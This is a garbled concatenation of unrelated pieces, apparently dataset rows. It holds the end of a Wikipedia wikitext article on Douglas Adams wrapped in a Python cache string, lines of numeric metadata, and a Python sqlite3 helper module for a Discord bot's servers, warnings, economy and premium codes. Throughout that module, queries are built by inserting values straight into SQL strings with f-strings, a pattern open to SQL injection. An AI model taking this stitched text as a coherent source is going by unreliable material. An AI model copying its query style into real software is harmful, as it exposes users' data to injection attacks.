(in the US edition), and [[Terry Jones]] (in the US paperback edition). It also includes eleven chapters of his long-awaited but unfinished novel, ''The Salmon of Doubt'', which was originally intended to become a new [[Dirk Gently]] novel, but might have later become the sixth ''Hitchhiker'' novel.<ext><name>ref</name><attr/><inner>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/reviews/the-salmon-of-doubt-by-douglas-adams-650803.html\n|title=The Salmon of Doubt by Douglas Adams\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|last=Murray\n|first=Charles Shaar\n| date=10 May 2002\n}}\n</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\n|title=Cover Stories: Douglas Adams, Narnia Chronicles, Something like a House\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|author=The Literator\n| date=5 January 2002|archiveurl=https://web.archive.org/web/20090801062359/http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html|archivedate=1 August 2009 }}\n</inner><close></ref></close></ext>\n\nOther events after Adams's death included a [[webcast]] production of ''[[Shada]]'', allowing the complete story to be told, radio dramatisations of the final three books in the ''Hitchhiker's'' series, and the completion of [[The Hitchhiker's Guide to the Galaxy (film)|the film adaptation]] of ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]''. The film, released in 2005, posthumously credits Adams as a producer, and several art design elements – including a head-shaped planet seen near the end of the film – incorporated Adams's features.\n\nA 12-part radio series based on the [[Dirk Gently]] novels was announced in 2007, with annual transmissions starting in October.<ext><name>ref</name><attr/><inner>{{cite web |url=http://www.dirkmaggs.dswilliams.co.uk/Dirk%20Maggs%20News%20%20new%20projects.htm |title=Dirk Maggs News and New Projects page }}{{dead link|date=June 2016|bot=medic}}{{cbignore|bot=medic}}</inner><close></ref></close></ext>\n\nBBC Radio 4 also commissioned a third Dirk Gently radio series based on the incomplete chapters of ''The Salmon of Doubt'', and written by [[Kim Fuller]];<ext><name>ref</name><attr/><inner>{{cite web|author=Matthew Hemley |url=http://www.thestage.co.uk/news/newsstory.php/24312/douglas-adams-final-dirk-gently-novel-to-be |title=The Stage / News / Douglas Adams's final Dirk Gently novel to be adapted for Radio 4 |work=The Stage |date=5 May 2009 |accessdate=20 August 2009}}</inner><close></ref></close></ext> but this was dropped in favour of a BBC TV series based on the two completed novels.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.chortle.co.uk/news/2009/10/11/9767/bbc_plans_dirk_gently_tv_series|title=BBC plans Dirk Gently TV series|publisher=Chortle.co.uk|date=11 October 2009|accessdate=11 October 2009}}</inner><close></ref></close></ext> A sixth ''Hitchhiker'' novel, ''[[And Another Thing... (novel)|And Another Thing...]]'', by ''[[Artemis Fowl (series)|Artemis Fowl]]'' author [[Eoin Colfer]], was released on 12 October 2009 (the 30th anniversary of the first book), published with the full support of Adams's estate. A [[BBC Radio 4]] ''[[Book at Bedtime]]'' adaptation and an audio book soon followed.\n\nOn 25 May 2001, two weeks after Adams's death, his fans organised a tribute known as [[Towel Day]], which has been observed every year since then.\n\nIn 2011, over 3,000 people took part in a public vote to choose the subjects of [[Blue plaque|People's Plaques]] in Islington;<ext><name>ref</name><attr> name="IPP"</attr><inner>{{cite web|url=http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |title=Islington People's Plaques |date=25 July 2011 |accessdate=13 August 2011 |deadurl=yes |archiveurl=https://web.archive.org/web/20120318001614/http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |archivedate=18 March 2012 }}</inner><close></ref></close></ext> Adams received 489 votes.\n\nOn 11 March 2013, Adams's 61st birthday was celebrated with an interactive [[Google Doodle]].<ext><name>ref</name><attr> name=GoogleDoodle2013a</attr><inner>{{cite news|title=Don't Panic! Google Doodle Honors Author Douglas Adams|url=http://abcnews.go.com/blogs/technology/2013/03/dont-panic-google-doodle-honors-author-douglas-adams/|accessdate=11 March 2013|newspaper=abc News|date=11 March 2013}}</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>{{cite web|title=Douglas Adams' 61st Birthday|url=http://www.google.com/doodles/douglas-adams-61st-birthday|accessdate=11 March 2013}}</inner><close></ref></close></ext>\n\n<h level=\"2\" i=\"18\">==Awards and nominations==</h>\n{| class="wikitable" style="font-size:90%"\n|- style="text-align:center;"\n! style="background:#B0C4DE;" | Year\n! style="background:#B0C4DE;" | Award\n! style="background:#B0C4DE;" | Work\n! style="background:#B0C4DE;" | Category\n! style="background:#B0C4DE;" | Result\n! style="background:#B0C4DE;" | Reference\n|-\n|1979\n|[[Hugo Award]]\n|''[[The Hitchhiker's Guide to the Galaxy (radio series)|The Hitchhiker's Guide to the Galaxy]]''<small>(shared with [[Geoffrey Perkins]])</small>\n|[[Hugo Award for Best Dramatic Presentation|Best Dramatic Presentation]]\n|<template><title>nom</title></template>\n|\n|}\n\n<h level=\"2\" i=\"19\">==Works==</h>\n<template lineStart=\"1\"><title>Refbegin</title><part><name index=\"1\"/><value>20em</value></part></template>\n* ''[[The Private Life of Genghis Khan]]'' (1975), based on a comedy sketch Adams co-wrote with [[Graham Chapman]] (short story)\n* ''[[The Hitchhiker's Guide to the Galaxy (radio series)|The Hitchhiker's Guide to the Galaxy]]'' (1978) (radio series)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]'' (1979) (novel)\n* ''[[Shada]]'' (1979–1980), a Doctor Who serial\n* ''[[The Restaurant at the End of the Universe]]'' (1980) (novel)\n* ''[[Life, the Universe and Everything]]'' (1982) (novel)\n* ''[[The Meaning of Liff]]'' (1983 (book), with [[John Lloyd (producer)|John Lloyd]])\n* ''[[So Long, and Thanks for All the Fish]]'' (1984) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]'' (1984, with [[Steve Meretzky]]) (computer game)\n* ''[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]]'' (1985, with [[Geoffrey Perkins]])\n* ''[[Young Zaphod Plays It Safe]] (short story)'' (1986)\n* ''[[A Christmas Fairly Story]]'' <template><title>sic</title></template> (1986, with [[Terry Jones]]), and\n* ''Supplement to The Meaning of Liff'' (1986, with [[John Lloyd (producer)|John Lloyd]] and [[Stephen Fry]]), both part of\n** ''[[The Utterly Utterly Merry Comic Relief Christmas Book]]'' (1986, edited with [[Peter Fincham]])\n* ''[[Bureaucracy (computer game)|Bureaucracy]]'' (1987) (computer game)\n* ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) (novel)\n* ''[[The Long Dark Tea-Time of the Soul]]'' (1988) (novel)\n* ''[[The Deeper Meaning of Liff]]'' (1990, with [[John Lloyd (producer)|John Lloyd]])\n* ''[[Last Chance to See]]'' (1990, with [[Mark Carwardine]]) (book)\n* ''[[Mostly Harmless]]'' (1992) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)#Illustrated edition|The Illustrated Hitchhiker's Guide to the Galaxy]]'' (1994)\n* ''[[Douglas Adams's Starship Titanic]]'' (1997), written by [[Terry Jones]], based on an idea by Adams\n* ''[[Starship Titanic]]'' (computer game) (1998)\n* ''[[h2g2]]'' (internet project) (1999)\n* ''The Internet: The Last Battleground of the 20th century'' (radio series) (2000)\n* ''[[The Hitchhiker's Guide to the Future]]'' (radio series) (2001) final project for [[BBC Radio 4]] before his death\n* ''[https://www.youtube.com/watch?v=_ZG8HBuDjgc Parrots, the universe and everything]'' (2001)\n* ''[[The Salmon of Doubt]]'' (2002), unfinished novel manuscript (11 chapters), short stories, essays, and interviews (also available as an audiobook, read by [[Simon Jones (actor)|Simon Jones]])\n* ''[[The Hitchhiker's Guide to the Galaxy (film)|The Hitchhiker's Guide to the Galaxy]]'' (2005) (film)\n<template lineStart=\"1\"><title>Refend</title></template>\n\n<h level=\"2\" i=\"20\">==Writing credits==</h>\n{| class="wikitable"\n|- style="background:#ccc; text-align:center;"\n! Production\n! Notes\n! Broadcaster\n|-\n|''[[Monty Python's Flying Circus]]''\n|\n*"[[List of Monty Python's Flying Circus episodes#6. Party Political Broadcast|Party Political Broadcast on Behalf of the Liberal Party]]" (1974)\n|[[BBC Two]]\n|-\n|''[[Out of the Trees]]''\n|\n*Television pilot (1976)\n|BBC Two\n|-\n|''[[Doctor on the Go]]''\n|\n*"For Your Own Good" (1977)\n|[[ITV (TV network)|ITV]]\n|-\n|''[[Doctor Who]]''\n|\n5 episodes (1978-1979, 1983): \n*"[[The Pirate Planet]]" (1978)\n*"[[Destiny of the Daleks]]" (1979) (uncredited)\n*"[[City of Death]]" (co-written with [[Graham Williams (television producer)|Graham Williams]], 1979)\n*"[[The Five Doctors]]" (1983) ([[Shada]] segments; uncredited)\n|[[BBC One]]\n|-\n|''[[Doctor Snuggles]]''\n|\n*"The Great Disappearing Mystery" (1979)\n*"The Remarkable Fidgety River" (1979)\n|ITV\n|-\n|''[[Not the Nine O'Clock News]]''\n|\n*Unknown episodes (1979)\n|BBC Two\n|-\n|''[[The Hitchhiker's Guide to the Galaxy (TV series)|The Hitchhiker's Guide to the Galaxy]]''\n|\n*6 episodes (1981)\n|BBC Two\n|-\n|''[[Hyperland]]''\n|\n*Television documentary (1990)\n|BBC Two\n|}\n\n<h level=\"2\" i=\"21\">==Notes==</h>\n<template lineStart=\"1\"><title>reflist</title><part><name index=\"1\"/><value>30em</value></part></template>\n\n<h level=\"2\" i=\"22\">==References==</h>\n* Adams, Douglas (1998). [http://www.biota.org/people/douglasadams/ Is there an Artificial God?], speech at ''Digital Biota 2'', Cambridge, England, September 1998.\n* <template><title>cite book</title><part><name>last</name><equals>=</equals><value>Adams</value></part><part><name>first</name><equals>=</equals><value>Douglas</value></part><part><name>title</name><equals>=</equals><value>The Salmon of Doubt: Hitchhiking the Galaxy One Last Time</value></part><part><name>year</name><equals>=</equals><value>2002</value></part><part><name>publisher</name><equals>=</equals><value>Macmillan</value></part><part><name>location</name><equals>=</equals><value>London</value></part><part><name>isbn</name><equals>=</equals><value>0-333-76657-1</value></part><part><name>ref</name><equals>=</equals><value>harv</value></part></template>\n* Dawkins, Richard (2003). "Eulogy for Douglas Adams," in ''A devil's chaplain: reflections on hope, lies, science, and love''. Houghton Mifflin Harcourt.\n* Felch, Laura (2004). [http://www.bookslut.com/nonfiction/2004_05_002057.php Don't Panic: Douglas Adams and the Hitchhiker's Guide to the Galaxy by Neil Gaiman], May 2004\n* Ray, Mohit K (2007). ''Atlantic Companion to Literature in English'', Atlantic Publishers and Distributors. ISBN 81-269-0832-7\n* <template><title>cite book</title><part><name>last</name><equals>=</equals><value>Simpson</value></part><part><name>first</name><equals>=</equals><value>M. J.</value></part><part><name>title</name><equals>=</equals><value>[[Hitchhiker: A Biography of Douglas Adams]]</value></part><part><name>year</name><equals>=</equals><value>2003</value></part><part><name>publisher</name><equals>=</equals><value>Justin, Charles & Co</value></part><part><name>location</name><equals>=</equals><value>Boston, Mass.</value></part><part><name>isbn</name><equals>=</equals><value>1-932112-17-0</value></part><part><name>edition</name><equals>=</equals><value>1st</value></part><part><name>ref</name><equals>=</equals><value>harv</value></part></template>\n* Webb, Nick (2005a). ''Wish You Were Here: The Official Biography of Douglas Adams''. Ballantine Books. ISBN 0-345-47650-6\n* Webb, Nick (2005b). [http://www.oxforddnb.com/view/article/75853 "Adams, Douglas Noël (1952–2001)"], ''Oxford Dictionary of National Biography'', Oxford University Press, January 2005. Retrieved 25 October 2005.\n\n<h level=\"2\" i=\"23\">==Further reading==</h>\n<h level=\"3\" i=\"24\">===Articles===</h>\n<template lineStart=\"1\"><title>Refbegin</title><part><name index=\"1\"/><value>30em</value></part></template>\n* Herbert, R. (1980). The Hitchhiker's Guide to the Galaxy (Book Review). Library Journal, 105(16), 1982.\n* Adams, J., & Brown, R. (1981). The Hitchhiker's Guide to the Galaxy (Book Review). School Library Journal, 27(5), 74.\n* Nickerson, S. L. (1982). The Restaurant at the End of the Universe (Book). Library Journal, 107(4), 476.\n* Nickerson, S. L. (1982). Life, the Universe, and Everything (Book). Library Journal, 107(18), 2007.\n* Morner, C. (1982). The Restaurant at the End of the Universe (Book Review). School Library Journal, 28(8), 87.\n* Morner, C. (1983). Life, the Universe and Everything (Book Review). School Library Journal, 29(6), 93.\n* Shorb, B. (1985). So Long, and Thanks for All the Fish (Book). School Library Journal, 31(6), 90.\n* The Long Dark Tea-Time of the Soul (Book). (1989). Atlantic (02769077), 263(4), 99.\n* Hoffert, B., & Quinn, J. (1990). Last Chance To See (Book). Library Journal, 115(16), 77.\n* Reed, S. S., & Cook, I. I. (1991). Dances with kakapos. People, 35(19), 79.\n* Last Chance to See (Book). (1991). Science News, 139(8), 126.\n* Field, M. M., & Steinberg, S. S. (1991). Douglas Adams. Publishers Weekly, 238(6), 62.\n* Dieter, W. (1991). Last Chance to See (Book). Smithsonian, 22(3), 140.\n* Dykhuis, R. (1991). Last Chance To See (Book). Library Journal, 116(1), 140.\n* Beatty, J. (1991). Good Show (Book). Atlantic (02769077), 267(3), 131.\n* A guide to the future. (1992). Maclean's, 106(44), 51.\n* Zinsser, J. (1993). Audio reviews: Fiction. Publishers Weekly, 240(9), 24.\n* Taylor, B., & Annichiarico, M. (1993). Audio reviews. Library Journal, 118(2), 132.\n* Good reads. (1995). NetGuide, 2(4), 109.\n* Stone, B. (1998). The unsinkable starship. Newsweek, 131(15), 78.\n* Gaslin, G. (2001). Galaxy Quest. Entertainment Weekly, (599), 79.\n* So long, and thanks for all the fish. (2001). Economist, 359(8222), 79.\n* Geier, T., & Raftery, B. M. (2001). Legacy. Entertainment Weekly, (597), 11.\n* Passages. (2001). Maclean's, 114(21), 13.\n* Don't panic! Douglas Adams to keynote Embedded show. (2001). Embedded Systems Programming, 14(3), 10.\n* Ehrenman, G. (2001). World Wide Weird. InternetWeek, (862), 15.\n* Zaleski, J. (2002). The Salmon of Doubt (Book). Publishers Weekly, 249(15), 43.\n* Mort, J. (2002). The Salmon of Doubt (Book). Booklist, 98(16), 1386.\n* Lewis, D. L. (2002). Last Time Round The Galaxy. Quadrant Magazine, 46(9), 84.\n* Burns, A. (2002). The Salmon of Doubt (Book). Library Journal, 127(15), 111.\n* Burns, A., & Rhodes, B. (2002). The Restaurant at the End of the Universe (Book). Library Journal, 127(19), 118.\n* Kaveney, R. (2002). A cheerful whale. TLS, (5173), 23.\n* Pearl, N., & Welch, R. (2003). The Hitchhiker's Guide To The Galaxy (Book). Library Journal, 128(11), 124.\n* Preying on composite materials. (2003). R&D Magazine, 45(6), 44.\n* Webb, N. (2003). The Berkeley Hotel hostage. Bookseller, (5069), 25.\n* The author who toured the universe. (2003). Bookseller, (5060), 35.\n* Osmond, A. (2005). Only human. Sight & Sound, 15(5), 12–15.\n* Culture vulture. (2005). Times Educational Supplement, (4640), 19.\n* Maughan, S. (2005). Audio Bestsellers/Fiction. Publishers Weekly, 252(30), 17.\n* Hitchhiker At The Science Museum. (2005). In Britain, 14(10), 9.\n* Rea, A. (2005). The Adams asteroids. New Scientist, 185(2488), 31.\n* Most Improbable Adventure. (2005). Popular Mechanics, 182(5), 32.\n* The Hitchhiker's Guide To The Galaxy: The Tertiary Phase. (2005). Publishers Weekly, 252(14), 21.\n* Bartelt, K. R. (2005). Wish You Were Here: The Official Biography of Douglas Adams. Library Journal, 130(4), 86.\n* Larsen, D. (2005). I was a teenage android. New Zealand Listener, 198(3390), 37–38.\n* Tanner, J. C. (2005). Simplicity: it's hard. Telecom Asia, 16(6), 6.\n* Nielsen Bookscan Charts. (2005). Bookseller, (5175), 18–21.\n* Buena Vista launches regional site to push Hitchhiker's movie. (2005). New Media Age, 9.\n* Shynola bring Beckland to life. (2005). Creative Review, 25(3), 24–26.\n* Carwardine, M. (15 September 2007). The baiji: So long and thanks for all the fish. New Scientist. pp.&nbsp;50–53.\n* Czarniawska, B. (2008). Accounting and gender across times and places: An excursion into fiction. Accounting, Organizations & Society, 33(1), 33–47.\n* Pope, M. (2008). Life, the Universe, Religion and Science. Issues, (82), 31–34.\n* Bearne, S. (2008). BBC builds site to trail Last Chance To See TV series. New Media Age, 08.\n* Arrow to reissue Adams. (2008). Bookseller, (5352), 14.\n* Page, B. (2008). Colfer is new Hitchhiker. Bookseller, (5350), 7.\n* I've got a perfect puzzle for you. (2009). Bookseller, (5404), 42.\n* Mostly Harmless.... (2009). Bookseller, (5374), 46.\n* Penguin and PanMac hitch a ride together. (2009). Bookseller, (5373), 6.\n* Adams, Douglas. Britannica Biographies [serial online]. October 2010;:1\n* Douglas (Noël) Adams (1952–2001). Hutchinson's Biography Database [serial online]. July 2011;:1\n* My life in books. (2011). Times Educational Supplement, (4940), 27.\n<template lineStart=\"1\"><title>Refend</title></template>\n\n<h level=\"3\" i=\"25\">===Other===</h>\n* <template><title>Wayback </title><part><name>df</name><equals>=</equals><value>yes</value></part><part><name>date</name><equals>=</equals><value>20110720193159 </value></part><part><name>url</name><equals>=</equals><value>http://www.douglasadams.com/ </value></part><part><name>title</name><equals>=</equals><value>Adams's official web site </value></part></template>, established by him, and still operated by [[The Digital Village]]\n* <template><title>TED speaker</title><part><name index=\"1\"/><value>douglas_adams</value></part></template>\n* [http://www.biota.org/people/douglasadams/ Douglas Adams speech at Digital Biota 2 (1998)] [http://www.biota.org/podcast/#DNA (The audio of the speech)]\n* [http://www.guardian.co.uk/books/2008/jun/09/douglasadams Guardian Books "Author Page"], with profile and links to further articles.\n* <template><title>Worldcat id</title><part><name>id</name><equals>=</equals><value>lccn-n80-76765</value></part></template>\n* [http://www.vintagemacworld.com/iifx.html Douglas Adams & his Computer] article about his Mac IIfx\n* BBC2 "Omnibus" tribute to Adams, presented by Kirsty Wark, 4 August 2001\n* Mueller, Rick and Greengrass, Joel (2002). ''Life, The Universe and Douglas Adams'', documentary.\n* Simpson, M.J. (2001). ''The Pocket Essential Hitchhiker's Guide''. ISBN 1-903047-40-4. Updated April 2005 ISBN 1-904048-46-3\n* [http://www.bbc.co.uk/programmes/p00fpvbm Special edition of BBC Book Club featuring Douglas Adams], first broadcast 2 January 2000 on BBC Radio 4\n\n<h level=\"2\" i=\"26\">==External links==</h>\n<template lineStart=\"1\"><title>Library resources box\n </title><part><name>by</name><equals>=</equals><value>yes\n </value></part><part><name>viaf</name><equals>=</equals><value>113230702\n </value></part><part><name>label</name><equals>=</equals><value>Douglas Adams</value></part></template>\n<template lineStart=\"1\"><title>Spoken Wikipedia-2</title><part><name index=\"1\"/><value>2006-02-11</value></part><part><name index=\"2\"/><value>Douglas_Adams_Part_1.ogg</value></part><part><name index=\"3\"/><value>Douglas_Adams_Part_2.ogg</value></part></template>\n* <template><title>Commons category-inline</title></template>\n* <template><title>Wikiquote-inline</title></template>\n* <template><title>Find a Grave</title><part><name index=\"1\"/><value>22814</value></part></template>\n* <template><title>IMDb name</title><part><name index=\"1\"/><value>0010930</value></part></template>\n* [http://towelday.org/ Towel Day, 25 May]\n\n<template lineStart=\"1\"><title>s-start</title></template>\n<template lineStart=\"1\"><title>s-bef</title><part><name>before</name><equals>=</equals><value> [[Anthony Read]]</value></part></template> \n<template lineStart=\"1\"><title>s-ttl</title><part><name>title</name><equals>=</equals><value>''[[Doctor Who]]'' script editor</value></part><part><name>years</name><equals>=</equals><value>1979–80</value></part></template> \n<template lineStart=\"1\"><title>s-aft</title><part><name>after</name><equals>=</equals><value> [[Christopher H. Bidmead]]</value></part></template>\n<template lineStart=\"1\"><title>s-end</title></template>\n<template lineStart=\"1\"><title>Douglas Adams</title></template>\n<template lineStart=\"1\"><title>HitchhikerBooks</title></template>\n<template lineStart=\"1\"><title>Dirk Gently</title></template>\n<template lineStart=\"1\"><title>Doctor Who</title></template>\n<template lineStart=\"1\"><title>Infocom games</title></template>\n<template lineStart=\"1\"><title>animal rights</title><part><name>state</name><equals>=</equals><value>collapsed</value></part></template>\n\n<template lineStart=\"1\"><title>Authority control</title></template>\n\n<template lineStart=\"1\"><title>DEFAULTSORT:Adams, Douglas</title></template>\n[[Category:Douglas Adams| ]]\n[[Category:1952 births]]\n[[Category:2001 deaths]]\n[[Category:Alumni of St John's College, Cambridge]]\n[[Category:Animal rights advocates]]\n[[Category:Atheism activists]]\n[[Category:Audio book narrators]]\n[[Category:British social commentators]]\n[[Category:BBC radio producers]]\n[[Category:British child writers]]\n[[Category:Burials at Highgate Cemetery]]\n[[Category:English atheists]]\n[[Category:English comedy writers]]\n[[Category:English humanists]]\n[[Category:English humorists]]\n[[Category:English radio writers]]\n[[Category:English science fiction writers]]\n[[Category:English television writers]]\n[[Category:Infocom]]\n[[Category:Interactive fiction writers]]\n[[Category:Monty Python]]\n[[Category:Non-fiction environmental writers]]\n[[Category:People educated at Brentwood School (Essex)]]\n[[Category:People from Cambridge]]\n[[Category:Usenet people]]\n[[Category:Critics of religions]]\n[[Category:20th-century English novelists]]\n[[Category:21st-century British novelists]]</root>"
}
}
"""
cache = {'query': query, 'response': response}
| 11,401.457143 | 252,351 | 0.721028 | 67,227 | 399,051 | 4.231395 | 0.053401 | 0.020354 | 0.031006 | 0.00914 | 0.836 | 0.800931 | 0.769556 | 0.735633 | 0.705404 | 0.674809 | 0 | 0.039085 | 0.083142 | 399,051 | 34 | 252,352 | 11,736.794118 | 0.737925 | 0.00005 | 0 | 0 | 0 | 0.133333 | 0.99983 | 0.409594 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.1 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
cc40f8ad15cfe29f31f39949f49cd9aa1f12a1c2 | 8,189 | py | Python | main1.py | Wumpuspro/Alpha-bot | 6ed21d152e60f62384f606b3e3b3f98c8e32e3a9 | [
"MIT"
] | null | null | null | main1.py | Wumpuspro/Alpha-bot | 6ed21d152e60f62384f606b3e3b3f98c8e32e3a9 | [
"MIT"
] | null | null | null | main1.py | Wumpuspro/Alpha-bot | 6ed21d152e60f62384f606b3e3b3f98c8e32e3a9 | [
"MIT"
] | null | null | null | import sqlite3
def add_server(server_id,status,role_id):
con = sqlite3.connect("date.db")
sql = f"insert into servers(server_id,status,role) values({server_id},'{status}','{role_id}');"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def all_servers():
con = sqlite3.connect("date.db")
sql = f"select * from servers;"
cur = con.cursor()
cur.execute(sql)
servers = cur.fetchall()
con.close()
return servers
def get_server(id):
con = sqlite3.connect("date.db")
sql = f"select * from servers where server_id = {id};"
cur = con.cursor()
cur.execute(sql)
server = cur.fetchone()
con.close()
return server
def delete_server(id):
con = sqlite3.connect("date.db")
sql = f"delete from servers where server_id = {id};"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def get_warns():
con = sqlite3.connect("date.db")
sql = f"select * from warns;"
cur = con.cursor()
cur.execute(sql)
warns = cur.fetchall()
con.close()
return warns
def add_warn(server_id):
con = sqlite3.connect("date.db")
sql = f"insert into warns(server_id,amount) values({server_id},1);"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def add_amount(server_id):
con = sqlite3.connect("date.db")
sql = f"select * from warns where server_id = {server_id};"
cur = con.cursor()
cur.execute(sql)
info = cur.fetchone()
amount = info[2] + 1
sql1 = f"update warns set amount = {amount} where server_id = {server_id};"
cur.execute(sql1)
con.commit()
con.close()
def get_amount(server_id):
con = sqlite3.connect("date.db")
sql = f"select * from warns where server_id = {server_id};"
cur = con.cursor()
cur.execute(sql)
info = cur.fetchone()
con.commit()
con.close()
return info[2]
def get_greet():
con = sqlite3.connect("date.db")
sql = f"select * from greet;"
cur = con.cursor()
cur.execute(sql)
servers = cur.fetchall()
con.close()
return servers
def add_greet(server_id,channel_id):
con = sqlite3.connect("date.db")
sql = f"insert into greet(server_id,channel_id,greetdel) values({server_id},{channel_id},4);"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def remove_greet(channel_id):
con = sqlite3.connect("date.db")
sql = f"delete from greet where channel_id = {channel_id};"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def get_users():
con = sqlite3.connect("date.db")
sql = f"select * from economy;"
cur = con.cursor()
cur.execute(sql)
users = cur.fetchall()
con.close()
return users
def add_user(user_id):
con = sqlite3.connect("date.db")
sql = f"insert into economy(user_id,balance,inventory) values({user_id},0,'Computer');"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def add_money(user_id,money):
con = sqlite3.connect("date.db")
cur = con.cursor()
sql = f"select * from economy where user_id == {user_id}"
cur.execute(sql)
user = cur.fetchone()
moneys = user[2]
full_money = moneys + money
sql1 = f"update economy set balance = {full_money} where user_id = {user_id}"
cur.execute(sql1)
con.commit()
con.close()
def share_money(user_id,user_ids,money):
con = sqlite3.connect("date.db")
cur = con.cursor()
user = get_info(user_ids)
moneys = user[2]
full_money = moneys + money
sql1 = f"update economy set balance = {full_money} where user_id = {user_ids}"
cur.execute(sql1)
sql3 = f"select * from economy where user_id = {user_id}"
cur.execute(sql3)
user = cur.fetchone()
moneys = user[2]
full_money = moneys - money
sql2 = f"update economy set balance = {full_money} where user_id = {user_id}"
cur.execute(sql2)
con.commit()
con.close()
def get_info(user_id):
con = sqlite3.connect("date.db")
cur = con.cursor()
sql = f"select * from economy where user_id == {user_id}"
cur.execute(sql)
user = cur.fetchone()
con.close()
return user
def give_money(user_ids,money):
con = sqlite3.connect("date.db")
cur = con.cursor()
user = get_info(user_ids)
moneys = user[2]
full_money = moneys + money
sql1 = f"update economy set balance = {full_money} where user_id = {user_ids}"
cur.execute(sql1)
con.commit()
con.close()
def remove_money(user_id,amount):
con = sqlite3.connect("date.db")
cur = con.cursor()
user = get_info(user_id)
moneys = user[2]
full_money = moneys - amount
sql1 = f"update economy set balance = {full_money} where user_id = {user_id}"
cur.execute(sql1)
con.commit()
con.close()
def add_inventory(user_id,name):
con = sqlite3.connect("date.db")
sql = f"update economy set inventory = {name} where user_id = {user_id};"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def update_greet(channel_id, time):
con = sqlite3.connect("date.db")
sql = f"update greet set greetdel = {time} where channel_id = {channel_id}"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def remove_code(code):
con = sqlite3.connect("date.db")
sql = f"delete from premium where code = '{code}'"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def add_code(code):
con = sqlite3.connect("date.db")
sql = f"insert into premium(code) values('{code}')"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def get_codes():
con = sqlite3.connect("date.db")
sql = f"select * from premium;"
cur = con.cursor()
cur.execute(sql)
codes = cur.fetchall()
con.close()
return codes
def add_premium(server_id):
con = sqlite3.connect("date.db")
sql = f"insert into premiumservers(server_id) values({server_id})"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def get_premiumservers():
con = sqlite3.connect("date.db")
sql = f"select * from premiumservers;"
cur = con.cursor()
cur.execute(sql)
servers = cur.fetchall()
con.close()
return servers
def add_funcmd(user_id):
con = sqlite3.connect("date.db")
sql = f"insert into funcmd(user_id) values({user_id})"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def get_funcmd():
con = sqlite3.connect("date.db")
sql = f"select * from funcmd;"
cur = con.cursor()
cur.execute(sql)
users = cur.fetchall()
con.close()
return users
def remove_funcmd(user_id):
con = sqlite3.connect("date.db")
sql = f"delete from funcmd where user_id = {user_id}"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def add_chatbot(channel_id):
con = sqlite3.connect("date.db")
sql = f"insert into chatbot(channel_id) values({channel_id})"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def get_chatbot():
con = sqlite3.connect("date.db")
sql = f"select * from chatbot;"
cur = con.cursor()
cur.execute(sql)
channels = cur.fetchall()
con.close()
return channels
def remove_chatbot(channel_id):
con = sqlite3.connect("date.db")
sql = f"delete from chatbot where channel_id = {channel_id}"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def get_join_channels():
con = sqlite3.connect("date.db")
sql = f"select * from joinchannel;"
cur = con.cursor()
cur.execute(sql)
channels = cur.fetchall()
con.close()
return channels
def add_joinchannel(guild_id,channel_id):
con = sqlite3.connect("date.db")
sql = f"insert into joinchannel(guild_id,channel_id) values({guild_id},{channel_id})"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
def remove_joinchannel(channel_id):
con = sqlite3.connect("date.db")
sql = f"delete from joinchannel where channel_id = {channel_id}"
cur = con.cursor()
cur.execute(sql)
con.commit()
con.close()
| 26.162939 | 99 | 0.632312 | 1,161 | 8,189 | 4.345392 | 0.062877 | 0.075322 | 0.114569 | 0.141526 | 0.843806 | 0.802577 | 0.776809 | 0.775619 | 0.757384 | 0.67889 | 0 | 0.009415 | 0.221761 | 8,189 | 312 | 100 | 26.246795 | 0.782206 | 0 | 0 | 0.714801 | 0 | 0 | 0.259372 | 0.041763 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122744 | false | 0 | 0.00361 | 0 | 0.169675 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
